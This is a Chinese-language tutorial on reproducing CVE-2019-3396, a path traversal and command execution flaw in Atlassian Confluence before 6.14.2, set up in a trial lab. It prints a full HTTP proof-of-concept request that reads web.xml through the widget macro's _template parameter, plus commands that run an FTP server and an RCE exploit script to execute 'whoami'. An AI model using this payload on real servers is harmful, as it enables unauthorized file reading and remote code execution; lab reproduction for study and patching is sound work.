Atlassian Confluence路徑穿越與命令執(zhí)行漏洞CVE-2019-3396怎么復(fù)現(xiàn)

Atlassian Confluence路徑穿越與命令執(zhí)行漏洞CVE-2019-3396怎么復(fù)現(xiàn)，相信很多沒有經(jīng)驗的人對此束手無策，為此本文總結(jié)了問題出現(xiàn)的原因和解決方法，通過這篇文章希望你能解決這個問題。

Atlassian Confluence是企業(yè)廣泛使用的wiki系統(tǒng)，其6.14.2版本前存在一處未授權(quán)的目錄穿越漏洞，通過該漏洞，攻擊者可以讀取任意文件，或利用Velocity模板注入執(zhí)行任意命令。

影響版本

Confluence 1.*.*、2.*.*、3.*.*、4.*.*、5.*.* Confluence 6.0.*、6.1.*、6.2.*、6.3.*、6.4.*、6.5.* Confluence 6.6.* < 6.6.12 Confluence6.7.*、6.8.*、6.9.*、6.10.*、6.11.* Confluence 6.12.* < 6.12.3 Confluence 6.13.* < 6.13.3 Confluence 6.14.* < 6.14.2

當(dāng)前系統(tǒng)環(huán)境Confluence Server 6.10.2：

環(huán)境啟動后，訪問http://your-ip:8090會進(jìn)入安裝引導(dǎo)，選擇“Trial installation”

之后會要求填寫license key。

點擊“Get an evaluation license”，（需gmail賬號）去Atlassian官方申請一個Confluence Server的測試證書（不要選擇Data Center和Addons）：

確認(rèn)安裝的ip

然后點擊Next安裝 。（建議使用4G內(nèi)存以上的機(jī)器進(jìn)行安裝與測試）本人是8G親測可以

配置系統(tǒng)管理員賬戶

裝完成之后 新建一個話題，然后，其他宏>小工具連接器

編輯抓包

任意文件讀取

發(fā)送如下poc，即可讀取文件web.xml：

POST /rest/tinymce/1/macro/preview HTTP/1.1

Host: xxx.xxx.xxx:8090

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: text/plain, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/json; charset=utf-8

Content-Length: 168

Origin: http://xxx.xxx.xxx.xxx:8090

Connection: close

Referer: http://xxx.xxx.xxx.xxx:8090/pages/resumedraft.action?draftId=65587&draftShareId=3aae85b8-030c-44bb-b8f4-d33a1771591c

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

命令執(zhí)行

python -m pyftpdlib -p 21

python RCE_exp.py http://xxx.xx.xx.xx:8090 "whoami"

看完上述內(nèi)容，你們掌握Atlassian Confluence路徑穿越與命令執(zhí)行漏洞CVE-2019-3396怎么復(fù)現(xiàn)的方法了嗎？如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注億速云行業(yè)資訊頻道，感謝各位的閱讀！